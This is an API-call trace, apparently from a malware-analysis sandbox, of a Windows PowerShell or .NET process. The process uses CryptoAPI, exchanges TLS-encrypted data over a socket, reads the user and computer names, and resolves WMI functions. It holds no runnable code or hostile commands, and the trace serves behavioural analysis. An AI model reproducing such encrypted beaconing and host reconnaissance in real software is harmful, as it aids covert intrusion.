	[0066.375] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.375] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.375] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.375] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.375] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.375] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.375] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.375] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.375] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.375] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.376] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.376] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 1
	[0066.377] CoTaskMemAlloc (cb=0x20) returned 0x233fc64f600
	[0066.377] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x233fc64f600, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x233fc64f600, pdwDataLen=0x350199c818) returned 1
	[0066.378] CoTaskMemFree (pv=0x233fc64f600) 
	[0066.378] CryptGetProvParam (in: hProv=0x233fc6ef160, dwParam=0x1, pbData=0x0, pdwDataLen=0x350199c818, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x350199c818) returned 0
	[0066.388] CoTaskMemAlloc (cb=0x104) returned 0x233fc6f3600
	[0066.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc6f3600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0066.388] CoTaskMemFree (pv=0x233fc6f3600) 
	[0066.473] CryptImportKey (in: hProv=0x233fc6ef160, pbData=0x233e47da498, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x350199d9f8 | out: phKey=0x350199d9f8*=0x233fc676610) returned 1
	[0066.473] CryptContextAddRef (hProv=0x233fc6ef160, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0066.492] GetVersionExW (in: lpVersionInformation=0x350199ca50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x350199ca50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0066.504] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x350199cc60 | out: pfEnabled=0x350199cc60) returned 0x0
	[0066.587] CoCreateGuid (in: pguid=0x350199cb00 | out: pguid=0x350199cb00*(Data1=0xf63e708e, Data2=0xe182, Data3=0x47a4, Data4=([0]=0xbe, [1]=0xfa, [2]=0xd, [3]=0xec, [4]=0x87, [5]=0xf, [6]=0x78, [7]=0x9a))) returned 0x0
	[0066.888] CryptContextAddRef (hProv=0x233fc6ef160, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0066.889] CryptDuplicateKey (in: hKey=0x233fc676610, pdwReserved=0x0, dwFlags=0x0, phKey=0x350199d5c8 | out: phKey=0x350199d5c8*=0x233fc676290) returned 1
	[0066.889] CryptContextAddRef (hProv=0x233fc6ef160, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0066.889] CryptSetKeyParam (hKey=0x233fc676290, dwParam=0x4, pbData=0x233e48c9a08*=0x1, dwFlags=0x0) returned 1
	[0066.889] CryptSetKeyParam (hKey=0x233fc676290, dwParam=0x1, pbData=0x233e48c99b8, dwFlags=0x0) returned 1
	[0066.988] CryptEncrypt (in: hKey=0x233fc676290, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x233e48d3a70*, pdwDataLen=0x350199d6d8*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x233e48d3a70*, pdwDataLen=0x350199d6d8*=0x1a0) returned 1
	[0066.988] CryptEncrypt (in: hKey=0x233fc676290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x233e48d3c48*, pdwDataLen=0x350199d6d8*=0x0, dwBufLen=0x10 | out: pbData=0x233e48d3c48*, pdwDataLen=0x350199d6d8*=0x10) returned 1
	[0067.147] select (in: nfds=0, readfds=0x233e44e4ea0, writefds=0x0, exceptfds=0x0, timeout=0x350199d370 | out: readfds=0x233e44e4ea0, writefds=0x0, exceptfds=0x0) returned 0
	[0067.160] EncryptMessage (in: phContext=0x350199cf00, fQOP=0x0, pMessage=0x233e44e5968, MessageSeqNo=0x0 | out: pMessage=0x233e44e5968) returned 0x0
	[0067.160] send (in: s=0x7cc, buf=0x233e44e5760*, len=245, flags=0 | out: buf=0x233e44e5760*) returned 245
	[0067.162] EncryptMessage (in: phContext=0x350199d080, fQOP=0x0, pMessage=0x233e44e5d98, MessageSeqNo=0x0 | out: pMessage=0x233e44e5d98) returned 0x0
	[0067.162] send (in: s=0x7cc, buf=0x233e44e5a90*, len=501, flags=0 | out: buf=0x233e44e5a90*) returned 501
	[0067.162] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0067.162] recv (in: s=0x7cc, buf=0x233e435a700, len=5, flags=0 | out: buf=0x233e435a700*) returned 5
	[0067.679] recv (in: s=0x7cc, buf=0x233e435a705, len=528, flags=0 | out: buf=0x233e435a705*) returned 528
	[0067.679] DecryptMessage (in: phContext=0x350199cf50, pMessage=0x233e44e6040, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e44e6040, pfQOP=0x0) returned 0x0
	[0067.679] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0067.679] SetEvent (hEvent=0x6b4) returned 1
	[0067.712] CryptAcquireContextW (in: phProv=0x350199c9c0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x350199c9c0*=0x233fc6ef360) returned 1
	[0067.726] CryptImportKey (in: hProv=0x233fc6ef360, pbData=0x233e463a380, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x350199d9f8 | out: phKey=0x350199d9f8*=0x233fc675180) returned 1
	[0067.726] CryptContextAddRef (hProv=0x233fc6ef360, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0067.759] CoTaskMemAlloc (cb=0x804) returned 0x233fc705ca0
	[0067.759] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233fc705ca0, nSize=0x350199d998 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350199d998) returned 0x1
	[0067.760] CoTaskMemFree (pv=0x233fc705ca0) 
	[0067.762] CoTaskMemAlloc (cb=0x204) returned 0x233fc68d6f0
	[0067.762] GetUserNameW (in: lpBuffer=0x233fc68d6f0, pcbBuffer=0x350199d9d8 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350199d9d8) returned 1
	[0067.762] CoTaskMemFree (pv=0x233fc68d6f0) 
	[0067.765] CoTaskMemAlloc (cb=0x204) returned 0x233fc690240
	[0067.765] GetComputerNameW (in: lpBuffer=0x233fc690240, nSize=0x350199d9d8 | out: lpBuffer="X2VS1CUM", nSize=0x350199d9d8) returned 1
	[0067.765] CoTaskMemFree (pv=0x233fc690240) 
	[0067.775] CoTaskMemAlloc (cb=0x104) returned 0x233fc6f3710
	[0067.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc6f3710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0067.775] CoTaskMemFree (pv=0x233fc6f3710) 
	[0067.780] CoTaskMemAlloc (cb=0x104) returned 0x233fc6f21d0
	[0067.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc6f21d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0067.781] CoTaskMemFree (pv=0x233fc6f21d0) 
	[0067.807] CoTaskMemAlloc (cb=0x104) returned 0x233fc6f3d70
	[0067.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc6f3d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0067.807] CoTaskMemFree (pv=0x233fc6f3d70) 
	[0068.016] CoGetObjectContext (in: riid=0x350199d378*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199d370 | out: ppv=0x350199d370*=0x233e121be30) returned 0x0
	[0068.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x350199be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0068.019] CoTaskMemAlloc (cb=0x43) returned 0x233fc67c960
	[0068.019] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\\\wminet_utils.dll") returned 0x7ffbf68f0000
	[0068.197] CoTaskMemFree (pv=0x233fc67c960) 
	[0068.198] CoTaskMemAlloc (cb=0xf) returned 0x233fc705820
	[0068.198] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="ResetSecurity") returned 0x7ffbf68f20e0
	[0068.199] CoTaskMemFree (pv=0x233fc705820) 
	[0068.218] CoTaskMemAlloc (cb=0xd) returned 0x233fc705820
	[0068.218] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="SetSecurity") returned 0x7ffbf68f21b0
	[0068.219] CoTaskMemFree (pv=0x233fc705820) 
	[0068.253] CoTaskMemAlloc (cb=0x14) returned 0x233fc705820
	[0068.253] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="BlessIWbemServices") returned 0x7ffbf68f2290
	[0068.254] CoTaskMemFree (pv=0x233fc705820) 
	[0068.288] CoTaskMemAlloc (cb=0x1a) returned 0x233fc650080
	[0068.288] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="BlessIWbemServicesObject") returned 0x7ffbf68f23b0
	[0068.288] CoTaskMemFree (pv=0x233fc650080) 
	[0068.299] CoTaskMemAlloc (cb=0x13) returned 0x233fc705820
	[0068.299] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetPropertyHandle") returned 0x7ffbf68f24d0
	[0068.299] CoTaskMemFree (pv=0x233fc705820) 
	[0068.304] CoTaskMemAlloc (cb=0x14) returned 0x233fc705900
	[0068.304] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="WritePropertyValue") returned 0x7ffbf68f2500
	[0068.304] CoTaskMemFree (pv=0x233fc705900) 
	[0068.317] CoTaskMemAlloc (cb=0x7) returned 0x233fc644bb0
	[0068.317] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Clone") returned 0x7ffbf68f2530
	[0068.317] CoTaskMemFree (pv=0x233fc644bb0) 
	[0068.322] CoTaskMemAlloc (cb=0x11) returned 0x233fc7059e0
	[0068.322] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="VerifyClientKey") returned 0x7ffbf68f31f0
	[0068.322] CoTaskMemFree (pv=0x233fc7059e0) 
	[0068.325] CoTaskMemAlloc (cb=0x11) returned 0x233fc705820
	[0068.325] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetQualifierSet") returned 0x7ffbf68f2a50
	[0068.325] CoTaskMemFree (pv=0x233fc705820) 
	[0068.329] CoTaskMemAlloc (cb=0x5) returned 0x233fc644bb0
	[0068.329] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Get") returned 0x7ffbf68f2700
	[0068.329] CoTaskMemFree (pv=0x233fc644bb0) 
	[0068.334] CoTaskMemAlloc (cb=0x5) returned 0x233fc644c70
	[0068.335] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Put") returned 0x7ffbf68f26c0
	[0068.335] CoTaskMemFree (pv=0x233fc644c70) 
	[0068.352] CoTaskMemAlloc (cb=0x8) returned 0x233fc644d10
	[0068.352] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Delete") returned 0x7ffbf68f2750
	[0068.352] CoTaskMemFree (pv=0x233fc644d10) 
	[0068.360] CoTaskMemAlloc (cb=0xa) returned 0x233fc705820
	[0068.360] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetNames") returned 0x7ffbf68f2760
	[0068.360] CoTaskMemFree (pv=0x233fc705820) 
	[0068.384] CoTaskMemAlloc (cb=0x12) returned 0x233fc705820
	[0068.384] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="BeginEnumeration") returned 0x7ffbf68f27b0
	[0068.384] CoTaskMemFree (pv=0x233fc705820) 
	[0068.392] CoTaskMemAlloc (cb=0x6) returned 0x233fc644d60
	[0068.392] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Next") returned 0x7ffbf68f27c0
	[0068.392] CoTaskMemFree (pv=0x233fc644d60) 
	[0068.399] CoTaskMemAlloc (cb=0x10) returned 0x233fc705a40
	[0068.400] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="EndEnumeration") returned 0x7ffbf68f2810
	[0068.400] CoTaskMemFree (pv=0x233fc705a40) 
	[0068.404] CoTaskMemAlloc (cb=0x19) returned 0x233fc64fbd0
	[0068.404] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetPropertyQualifierSet") returned 0x7ffbf68f2820
	[0068.404] CoTaskMemFree (pv=0x233fc64fbd0) 
	[0068.408] CoTaskMemAlloc (cb=0x7) returned 0x233fc644b10
	[0068.409] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Clone") returned 0x7ffbf68f2530
	[0068.409] CoTaskMemFree (pv=0x233fc644b10) 
	[0068.409] CoTaskMemAlloc (cb=0xf) returned 0x233fc705820
	[0068.409] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetObjectText") returned 0x7ffbf68f2840
	[0068.409] CoTaskMemFree (pv=0x233fc705820) 
	[0068.414] CoTaskMemAlloc (cb=0x13) returned 0x233fc705820
	[0068.415] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="SpawnDerivedClass") returned 0x7ffbf68f2860
	[0068.415] CoTaskMemFree (pv=0x233fc705820) 
	[0068.418] CoTaskMemAlloc (cb=0xf) returned 0x233fc705820
	[0068.418] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="SpawnInstance") returned 0x7ffbf68f2880
	[0068.418] CoTaskMemFree (pv=0x233fc705820) 
	[0068.423] CoTaskMemAlloc (cb=0xb) returned 0x233fc705820
	[0068.423] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="CompareTo") returned 0x7ffbf68f28a0
	[0068.423] CoTaskMemFree (pv=0x233fc705820) 
	[0068.426] CoTaskMemAlloc (cb=0x13) returned 0x233fc705820
	[0068.427] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetPropertyOrigin") returned 0x7ffbf68f28c0
	[0068.427] CoTaskMemFree (pv=0x233fc705820) 
	[0068.437] CoTaskMemAlloc (cb=0xe) returned 0x233fc705820
	[0068.438] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="InheritsFrom") returned 0x7ffbf68f28e0
	[0068.438] CoTaskMemFree (pv=0x233fc705820) 
	[0068.450] CoTaskMemAlloc (cb=0xb) returned 0x233fc705820
	[0068.450] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetMethod") returned 0x7ffbf68f28f0
	[0068.450] CoTaskMemFree (pv=0x233fc705820) 
	[0068.460] CoTaskMemAlloc (cb=0xb) returned 0x233fc705820
	[0068.460] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="PutMethod") returned 0x7ffbf68f2940
	[0068.460] CoTaskMemFree (pv=0x233fc705820) 
	[0068.473] CoTaskMemAlloc (cb=0xe) returned 0x233fc705b60
	[0068.474] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="DeleteMethod") returned 0x7ffbf68f2990
	[0068.474] CoTaskMemFree (pv=0x233fc705b60) 
	[0068.479] CoTaskMemAlloc (cb=0x18) returned 0x233fc705820
	[0068.479] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="BeginMethodEnumeration") returned 0x7ffbf68f29a0
	[0068.479] CoTaskMemFree (pv=0x233fc705820) 
	[0068.482] CoTaskMemAlloc (cb=0xc) returned 0x233fc705820
	[0068.482] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="NextMethod") returned 0x7ffbf68f29b0
	[0068.482] CoTaskMemFree (pv=0x233fc705820) 
	[0068.487] CoTaskMemAlloc (cb=0x16) returned 0x233fc705820
	[0068.487] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="EndMethodEnumeration") returned 0x7ffbf68f2a00
	[0068.487] CoTaskMemFree (pv=0x233fc705820) 
	[0068.488] CoTaskMemAlloc (cb=0x17) returned 0x233fc705820
	[0068.488] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetMethodQualifierSet") returned 0x7ffbf68f2a10
	[0068.488] CoTaskMemFree (pv=0x233fc705820) 
	[0068.491] CoTaskMemAlloc (cb=0x11) returned 0x233fc705820
	[0068.491] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetMethodOrigin") returned 0x7ffbf68f2a30
	[0068.491] CoTaskMemFree (pv=0x233fc705820) 
	[0068.496] CoTaskMemAlloc (cb=0x12) returned 0x233fc705820
	[0068.496] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_Get") returned 0x7ffbf68f2a60
	[0068.496] CoTaskMemFree (pv=0x233fc705820) 
	[0068.500] CoTaskMemAlloc (cb=0x12) returned 0x233fc705820
	[0068.501] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_Put") returned 0x7ffbf68f2ab0
	[0068.501] CoTaskMemFree (pv=0x233fc705820) 
	[0068.505] CoTaskMemAlloc (cb=0x15) returned 0x233fc705820
	[0068.505] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_Delete") returned 0x7ffbf68f2ae0
	[0068.505] CoTaskMemFree (pv=0x233fc705820) 
	[0068.508] CoTaskMemAlloc (cb=0x17) returned 0x233fc705820
	[0068.508] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_GetNames") returned 0x7ffbf68f2af0
	[0068.508] CoTaskMemFree (pv=0x233fc705820) 
	[0068.513] CoTaskMemAlloc (cb=0x1f) returned 0x233fc64f930
	[0068.513] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x7ffbf68f2b10
	[0068.513] CoTaskMemFree (pv=0x233fc64f930) 
	[0068.515] CoTaskMemAlloc (cb=0x13) returned 0x233fc7059e0
	[0068.516] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_Next") returned 0x7ffbf68f2b20
	[0068.516] CoTaskMemFree (pv=0x233fc7059e0) 
	[0068.519] CoTaskMemAlloc (cb=0x1d) returned 0x233fc64fae0
	[0068.519] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_EndEnumeration") returned 0x7ffbf68f2b70
	[0068.520] CoTaskMemFree (pv=0x233fc64fae0) 
	[0068.520] CoTaskMemAlloc (cb=0x19) returned 0x233fc64fe40
	[0068.521] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetCurrentApartmentType") returned 0x7ffbf68f2a50
	[0068.521] CoTaskMemFree (pv=0x233fc64fe40) 
	[0068.527] CoTaskMemAlloc (cb=0x16) returned 0x233fc705820
	[0068.528] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetDemultiplexedStub") returned 0x7ffbf68f2060
	[0068.528] CoTaskMemFree (pv=0x233fc705820) 
	[0068.531] CoTaskMemAlloc (cb=0x17) returned 0x233fc705920
	[0068.531] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="CreateInstanceEnumWmi") returned 0x7ffbf68f1760
	[0068.531] CoTaskMemFree (pv=0x233fc705920) 
	[0068.536] CoTaskMemAlloc (cb=0x14) returned 0x233fc705820
	[0068.536] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="CreateClassEnumWmi") returned 0x7ffbf68f18c0
	[0068.536] CoTaskMemFree (pv=0x233fc705820) 
	[0068.540] CoTaskMemAlloc (cb=0xe) returned 0x233fc705820
	[0068.540] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="ExecQueryWmi") returned 0x7ffbf68f1a20
	[0068.540] CoTaskMemFree (pv=0x233fc705820) 
